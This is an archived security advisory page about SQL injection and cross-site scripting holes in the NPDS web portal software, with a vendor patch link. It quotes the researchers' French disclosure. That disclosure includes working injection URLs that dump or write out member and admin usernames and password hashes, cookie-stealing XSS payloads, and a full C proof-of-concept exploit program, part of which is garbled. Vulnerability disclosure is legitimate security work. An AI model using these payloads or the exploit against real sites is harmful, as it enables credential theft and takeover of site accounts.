SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Net Portal Dynamic System (NPDS) Vendors:   npds.org
NPDS Input Validation Holes in 'glossaire' Module and Links Search Script Permit SQL Injection
SecurityTracker Alert ID:  1014073
SecurityTracker URL:  http://securitytracker.com/id/1014073
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 29 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   NoSP and Romano reported several vulnerabilities in NPDS. A remote user can inject SQL commands. A remote user can conduct cross-site scripting attacks.

Several scripts do not properly validate user-supplied input. A remote user can supply specially crafted parameter values to execute SQL commands on the underlying database.

The '/modules/glossaire/glossaire.php' script (which is not installed by default) does not properly validate user-supplied input in the 'terme' variable. Some demonstration exploit URLs are provided:

http://[target]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_terme&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,

http://[target]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_terme&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,

The 'links.php?op=search' script does not properly validate user-supplied input in the 'query' parameter. Some demonstration exploit URLs are provided:

http://[target]/links.php?op=search&query=google%'%20UNION%20SELECT%200,uname,pass,0,0,0,0,0%20FROM%20users%20where%20uname<>''%20INTO%20OUTFILE%20'

http://[target]/links.php?op=search&query=google%'%20UNION%20SELECT%200,aid,pwd,0,0,0,0,0%20FROM%20authors%20where%20aid<>''%20INTO%20OUTFILE%20'/va

A remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the NPDS software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/npds/admin.php?mainfile=e&language=<script>alert(document.cookie);</script>

http://[target]/npds/powerpack_f.php?language=<script>alert()</script>

http://[target]/npds/sdv_infos.php?sitename=<script>alert()</script>

http://[target]/faq.php?myfaq=ys&id_cat=99&categories=<script>alert()</script>

http://[target]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_lettre&lettre=<script>alert()</script>

http://[target]/reviews.php?op=postcomment&id=1&title=%3Cscript%3Ealert();%3C/script%3E

The 'reply.php' script does not properly validate user-supplied input in the 'image_subject' parameter. A remote user can inject scripting code that will be permanently retained on the system.

http://[target]/reply.php?post=1&forum=1&topic=1&stop=2&image_subject="><script>alert('je viens de recuperer ton
cookie');</script>&userdata='&time='&poster_ip='&hostname='&message=test&submit=Valider

Impact:   A remote user can execute SQL commands on the underlying database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the NPDS software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   The vendor has issued a patch, available at:

http://www.npds.org/download.php?op=geninfo&did=115

Vendor URL:  www.npds.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  NPDS Input validation holes, Xss & SQL Injection


Script :
********
GNU/GPL.
http://www.npds.org


**********
- XSS Non permanent 
- XSS permanent
 
 
*********
 
1) XSS non permanent :
----------------------
 
Il suffit de faire : 

http://[site]/npds/admin.php?mainfile=e&language=<script>alert(document.cookie);</script>

http://[site]/npds/powerpack_f.php?language=<script>alert()</script>
//idem pr push.php

http://[site]/npds/sdv_infos.php?sitename=<script>alert()</script>

http://[site]/faq.php?myfaq=ys&id_cat=99&categories=<script>alert()</script>

http://[site]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_lettre&lettre=<script>alert()</script>

http://[site]/reviews.php?op=postcomment&id=1&title=%3Cscript%3Ealert();
%3C/script%3E

 
 
2) XSS permanent :
------------------
certaines balises dangeureuses.
 
http://[site]/reply.php?post=1&forum=1&topic=1&stop=2&image_subject="><script>alert('je 
viens de recuperer ton 
cookie');</script>&userdata='&time='&poster_ip='&hostname='&message=test&submit=Valider


3) SQL Injection :
------------------

- Page /modules/glossaire/glossaire.php


La variable $terme subit un stripslashes() et agit directement dans le 

http://[site]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_terme&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,0,uname,pass,0,0%20from%20users%20where%20uname<>''/*
Vous verrez afficher les login/pass de tout les membres sur la page 
glossaire.php !

http://[site]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_terme&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,0,aid,pwd,0,0%20from%20authors%20where%20name<>''/* 
Vous verrez afficher les login/pass de tout les ADMIN sur la page 
glossaire.php !

- Page links.php?op=search


2 exploits :

http://[site]/links.php?op=search&query=google%'%20UNION%20SELECT%200,uname,pass,0,0,0,0,0%20FROM%20users%20where%20uname<>''%20INTO%20OUTFILE%20'/var/www/html/npds/sql/sqlinjection.txt'/*
membres).


http://[site]/links.php?op=search&query=google%'%20UNION%20SELECT%200,aid,pwd,0,0,0,0,0%20FROM%20authors%20where%20aid<>''%20INTO%20OUTFILE%20'/var/www/html/npds/sql/sauvegarde.txt'/*
admin).

**************
 
ou 
Appliquer le patch correctif pour Narval : 
http://www.npds.org/download.php?op=geninfo&did=115
 

Proof of concept SQL injection links.php :
******************************************

#include<string.h>
#include<netdb.h>
#include<stdio.h>
#include<stdlib.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>


/*Port HTTP*/
#define PORT 80

#define MAXLEN 4096

main(int argc, char *argv[]){

if ((argc != 2) || (strlen(argv[1])>=256))
{
printf( "\n");
printf( "-----------------------------------------------------------------\n");
printf( " Xploit_NPDS-Narval\n");
printf( " NPDS Remote SQL Injection Proof of concept\n");
printf( " Vulnerability discovered && Exploit coded by \n");
printf( " Romano <romano_45_at_hotmail_dot_com> &&\n");
printf( " NoSP <NoSP_at_thehackademy_dot_net>\n");
printf( " Usage: ./Xploit_npds_5.0 <server> or <ip>\n");
printf( " ex : ./Xploit_npds_5.0 127.0.0.1 or\n");
printf( "      ./Xploit_npds_5.0 localhost or\n");
printf( "      ./Xploit_npds_5.0 www.site.com/npds\n");  
printf( "-----------------------------------------------------------------\n");
exit(1);
}

/*define variable*/

int fd;

char *fin_cut;
char *deb_cut;
char dossier[512];
char path_disclosure[4096];
char recept[1024];
char path[2048];
char sql_inject[4096];
char envoi[]="non";

if(strstr(argv[1],"/")){
	deb_cut=strstr(argv[1],"/")+strlen("/");
	strncpy(dossier,"/",strlen("/"));
	strncat(dossier,deb_cut,strlen(deb_cut));
	strncat(dossier,"/",strlen("/"));
	/*On coupe le nom de domaine*/
	fin_cut=strstr(argv[1],"/");
	*fin_cut='\0';

}else{
	strncpy(dossier,"/",strlen("/"));
}


if((fd=socket(AF_INET,SOCK_STREAM,0))==1 ){
	exit(EXIT_FAILURE);}

/*Define structure sockaddr_in*/
struct sockaddr_in addr;
addr.sin_family=AF_INET;
addr.sin_port=htons(PORT);
addr.sin_addr.s_addr=inet_addr(argv[1]);
memset(&(addr.sin_zero),'\0',8);



if( addr.sin_addr.s_addr!=-1){
	if(connect(fd,(struct sock_addr *)&addr,sizeof(struct sockaddr))==-1){
	exit(EXIT_FAILURE);
	}
	}else{

	struct hostent *hp;
	if(hp=gethostbyname(argv[1])){
	bcopy( (char *) hp->h_addr_list[0],(char 
*)&(addr.sin_addr),sizeof(addr.sin_addr) );
	if(connect(fd,(struct sock_addr *)&addr,sizeof(struct sockaddr))==-1){
	exit(EXIT_FAILURE);
	}
	}

	strncpy(path_disclosure,"GET ",strlen("GET "));
	strncat(path_disclosure,dossier,strlen(dossier));
	strncat(path_disclosure,"modules/links/admin/links.php HTTP/1.1\r\nHost: 
",strlen("modules/links/admin/links.php HTTP/1.1\r\nHost: "));
	strncat(path_disclosure,argv[1],strlen(argv[1]));
	strncat(path_disclosure,"\r\nConnection: 
Keep-Alive\r\n\n",strlen("\r\nConnection: Keep-Alive\r\n\n\0"));
/*Et on l'envoie*/
	if(send(fd,path_disclosure,strlen(path_disclosure),0)){printf("Recherche de 
$PATH du site.....\n");}

/*reception et traitement des messages*/
while(recv(fd,recept,1024,0)){

		if(strstr(recept,"_error() in <b>") && strstr(recept,"/modules/")){
			deb_cut=strstr(recept,"_error() in <b>")+strlen("_error() in <b>");
			fin_cut=strstr(recept,"modules/");
			*fin_cut='\0';
			strncpy(path,deb_cut,strlen(deb_cut));
strncpy(envoi,"oui",strlen("oui"));
		}else{
		exit(1);
		}

		if(strstr(envoi,"oui")){
			strncpy(sql_inject,"GET ",strlen("GET "));
			strncat(sql_inject,dossier,strlen(dossier));
			
strncat(sql_inject,"/links.php?op=search&query=test%20'%20UNION%20SELECT%200,aid,pwd,0,0,0,0,0%20FROM%20authors%20where%20aid%3C%3E''%20INTO%20OUTFILE%20'",
strlen("/links.php?op=search&query=test%20'%20UNION%20SELECT%200,aid,pwd,0,0,0,0,0%20FROM%20authors%20where%20aid%3C%3E''%20INTO%20OUTFILE%20'"));
			strncat(sql_inject,path,strlen(path));
			strncat(sql_inject,"Authors.txt'/* HTTP/1.1\r\nHost: 
",strlen("Authors.txt'/* HTTP/1.1\r\nHost: "));
			strncat(sql_inject,argv[1],strlen(argv[1]));
			strncat(sql_inject,"\r\nConnection: 
Keep-Alive\r\n\n\0",strlen("\r\nConnection: Keep-Alive\r\n\n\0"));
	
				if(send(fd,sql_inject,strlen(sql_inject),0)){
http://%s%sAuthors.txt\n",argv[1],dossier);
					exit(1);
				}else{
				exit(1);
				}
		}

bzero(recept,MAXLEN);
bzero(path,MAXLEN);
bzero(sql_inject,MAXLEN);
bzero(path_disclosure,MAXLEN);
}

close(fd);
return 0;
}

*********
 
NoSP <nosp@thehackademy.net>
Romano <romano_45@hotmail.com>

sa correction rapide  ;) 
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC